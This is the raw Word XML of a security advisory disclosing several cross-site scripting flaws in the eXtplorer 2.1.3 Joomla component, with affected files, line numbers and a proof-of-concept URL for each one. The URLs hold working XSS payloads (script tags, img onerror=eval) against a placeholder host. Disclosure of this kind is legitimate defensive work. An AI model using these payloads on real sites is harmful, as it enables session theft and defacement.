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543" w:rsidRDefault="002D6543" w:rsidP="00DD297E">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00B51EC6" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>ultiple cross-site scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidR="00B90310" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B51EC6" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>vulnerabili</w:t>
      </w:r>
      <w:r w:rsidR="00E847D6" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">ties </w:t>
      </w:r>
      <w:r w:rsidR="00155C91" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="002D3EE2" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> e</w:t>
      </w:r>
      <w:r w:rsidR="00D21380" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="002D3EE2" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>tplorer 2.1.3</w:t>
      </w:r>
      <w:r w:rsidR="00713987" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E959D0">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>for Joomla</w:t>
      </w:r>
      <w:r w:rsidR="00E959D0">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow remote attackers </w:t>
      </w:r>
      <w:r w:rsidR="00DD297E" w:rsidRPr="00DD297E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">to inject arbitrary web script or HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="00D55708">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D11E58">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r w:rsidR="00307ACB">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00307ACB">
        <w:t>a crafted string in</w:t>
      </w:r>
      <w:r w:rsidR="00D11E58">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> the URL to</w:t>
      </w:r>
      <w:r w:rsidR="00DD297E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD297E" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">application.js.php, admin.php, </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK11"/>
      <w:r w:rsidR="00DD297E" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>copy_move.php</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00DD297E" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>, functions.php,</w:t>
      </w:r>
      <w:r w:rsidR="00DD297E" w:rsidRPr="002D6543">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD297E" w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>header.php and</w:t>
      </w:r>
      <w:r w:rsidR="00DD297E" w:rsidRPr="002D6543">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD297E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>upload.php</w:t>
      </w:r>
      <w:r w:rsidR="00D11E58">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A66ED" w:rsidRDefault="002A66ED" w:rsidP="002A66ED">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="st"/>
        </w:rPr>
        <w:t>Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00435BC3">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="MediumShading1-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00435BC3" w:rsidRPr="00A051C4" w:rsidRDefault="00435BC3" w:rsidP="00435BC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A051C4">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A051C4" w:rsidRPr="00A051C4" w:rsidRDefault="00B22D74" w:rsidP="00A051C4">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
            <w:r w:rsidR="00A051C4" w:rsidRPr="00A051C4">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>: eXtplorer 2.1.3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A051C4" w:rsidRDefault="00A051C4" w:rsidP="00A051C4">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A051C4">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Home Page Address:</w:t>
            </w:r>
            <w:r w:rsidR="006D3693">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006D3693" w:rsidRPr="006D3693">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>http://extplorer.net/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A051C4" w:rsidRDefault="00A051C4" w:rsidP="00A051C4">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D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Pr="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00184D4D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 xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="00810C2F" w:rsidRPr="00810C2F">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/scripts/</w:t>
            </w:r>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>application.js.php</w:t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Line: 45</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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5936615" cy="798195"/>
                  <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
                  <wp:docPr id="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798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P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POC:</w:t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http://site/administrator/index.php/"&gt;&lt;/script&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;?option=com_extplorer&amp;tmpl=component</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D" w:rsidP="00184D4D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435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D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Pr="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00184D4D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 xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00A41730" w:rsidRPr="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidR="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>admin.php</w:t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Lines: 72, 143, 176 and 210</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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4013863" cy="157460"/>
                  <wp:effectExtent l="19050" t="0" r="5687" b="0"/>
                  <wp:docPr id="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5260" cy="157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7EC3" w:rsidRDefault="001A7EC3" w:rsidP="001A7EC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename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3841844" cy="114153"/>
                  <wp:effectExtent l="19050" t="0" r="6256" b="0"/>
                  <wp:docPr id="2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6011" cy="114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7EC3" w:rsidRDefault="001A7EC3" w:rsidP="001A7EC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename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5936615" cy="143510"/>
                  <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
                  <wp:docPr id="2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143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7EC3" w:rsidRDefault="001A7EC3" w:rsidP="001A7EC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename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5936615" cy="149860"/>
                  <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
                  <wp:docPr id="2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149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5BC3" w:rsidRDefault="00435BC3" w:rsidP="00435BC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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POC:</w:t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bookmarkStart w:id="1" w:name="OLE_LINK12"/>
            <w:bookmarkStart w:id="2" w:name="OLE_LINK13"/>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://site/administrator/index.php/&lt;img src=x:alert(alt) onerror=eval(src) alt=XSS&gt;?option=com_extplorer&amp;tmpl=component&amp;action=post&amp;do_action=admin</w:t>
            </w:r>
            <w:bookmarkEnd w:id="1"/>
            <w:bookmarkEnd w:id="2"/>
          </w:p>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D" w:rsidP="00184D4D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435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D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Pr="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00184D4D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 xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D" w:rsidRPr="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">copy_move.php </w:t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 xml:space="preserve">Line: 158 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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4016877" cy="126231"/>
                  <wp:effectExtent l="19050" t="0" r="2673" b="0"/>
                  <wp:docPr id="2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8230" cy="12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5BC3" w:rsidRP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bookmarkStart w:id="3" w:name="OLE_LINK14"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK15"/>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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POC</w:t>
            </w:r>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="st"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:bookmarkEnd w:id="3"/>
          <w:bookmarkEnd w:id="4"/>
          <w:p w:rsidR="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00A051C4">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left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lastRenderedPageBreak/>
              <w:t>http://site/administrator/index.php/&lt;img src=x onerror=alert('XSS') &gt;?option=com_extplorer&amp;tmpl=component&amp;action=post&amp;do_action=copy</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D" w:rsidP="00184D4D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435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D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Pr="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00184D4D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 xml:space="preserve">File:  </w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D" w:rsidRPr="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">functions.php </w:t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 xml:space="preserve">Line: 933 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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4048223" cy="675564"/>
                  <wp:effectExtent l="19050" t="0" r="9427" b="0"/>
                  <wp:docPr id="2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228" cy="675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5BC3" w:rsidRDefault="00435BC3" w:rsidP="00435BC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRP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POC:</w:t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http://site/administrator/index.php/"&gt;&lt;/script&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;?option=com_extplorer&amp;tmpl=component</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D" w:rsidP="00184D4D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435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D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Pr="00352640" w:rsidRDefault="00435BC3" w:rsidP="00184D4D">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D" w:rsidRPr="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>header.php</w:t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352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Line: 73</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00352640" w:rsidRPr="00352640" w:rsidRDefault="00352640" w:rsidP="00352640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5936615" cy="340995"/>
                  <wp:effectExtent l="19050" t="0" r="6985" b="0"/>
                  <wp:docPr id="2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40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2640" w:rsidRPr="00352640" w:rsidRDefault="00352640" w:rsidP="00435BC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="OLE_LINK16"/>
            <w:bookmarkStart w:id="6" w:name="OLE_LINK17"/>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRPr="00352640" w:rsidRDefault="00435BC3" w:rsidP="00352640">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>POC:</w:t>
            </w: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 w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://site/administrator/index.php/"&gt;&lt;/script&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;?option=com_extplorer&amp;tmpl=component</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
          <w:p w:rsidR="00184D4D" w:rsidRPr="00435BC3" w:rsidRDefault="00184D4D" w:rsidP="00184D4D">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00435BC3" w:rsidTr="00435BC3">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00184D4D" w:rsidRDefault="00184D4D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Pr="00352640" w:rsidRDefault="00435BC3" w:rsidP="00184D4D">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">File: </w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D" w:rsidRPr="00A41730">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>include</w:t>
            </w:r>
            <w:r w:rsidR="00B4407D">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>upload.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00435BC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Lines: 191 and 259</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00352640" w:rsidRPr="00352640" w:rsidRDefault="00352640" w:rsidP="00352640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4132146" cy="156917"/>
                  <wp:effectExtent l="19050" t="0" r="1704" b="0"/>
                  <wp:docPr id="2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1113" cy="156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1D9A" w:rsidRDefault="00631D9A" w:rsidP="00631D9A">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00435BC3">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="4135423" cy="127019"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="2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5184" cy="128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2640" w:rsidRPr="00352640" w:rsidRDefault="00352640" w:rsidP="00435BC3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35BC3" w:rsidRPr="00352640" w:rsidRDefault="00435BC3" w:rsidP="00352640">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="st"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>POC</w:t>
            </w:r>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="st"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00435BC3" w:rsidRDefault="00435BC3" w:rsidP="00A051C4">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00352640">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://site/administrator/index.php/&lt;img src=x:alert(alt) onerror=eval(src) alt=XSS&gt;?option=com_extplorer&amp;tmpl=component&amp;action=upload</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00184D4D" w:rsidRPr="00435BC3" w:rsidRDefault="00184D4D" w:rsidP="00184D4D">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00380F8D" w:rsidRDefault="00380F8D" w:rsidP="00380F8D">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00380F8D" w:rsidSect="004877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5D7" w:rsidRDefault="00C715D7" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00C715D7" w:rsidRDefault="00C715D7" w:rsidP="00D34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5D7" w:rsidRDefault="00C715D7" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00C715D7" w:rsidRDefault="00C715D7" w:rsidP="00D347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155F"/>
    <w:rsid w:val="00033839"/>
    <w:rsid w:val="00045B71"/>
    <w:rsid w:val="00053DEB"/>
    <w:rsid w:val="00090052"/>
    <w:rsid w:val="000F5CED"/>
    <w:rsid w:val="001111D8"/>
    <w:rsid w:val="00143E24"/>
    <w:rsid w:val="00155C91"/>
    <w:rsid w:val="0018182E"/>
    <w:rsid w:val="00184D4D"/>
    <w:rsid w:val="001938B9"/>
    <w:rsid w:val="001A7EC3"/>
    <w:rsid w:val="001B687F"/>
    <w:rsid w:val="001E2F80"/>
    <w:rsid w:val="00210800"/>
    <w:rsid w:val="00215D8D"/>
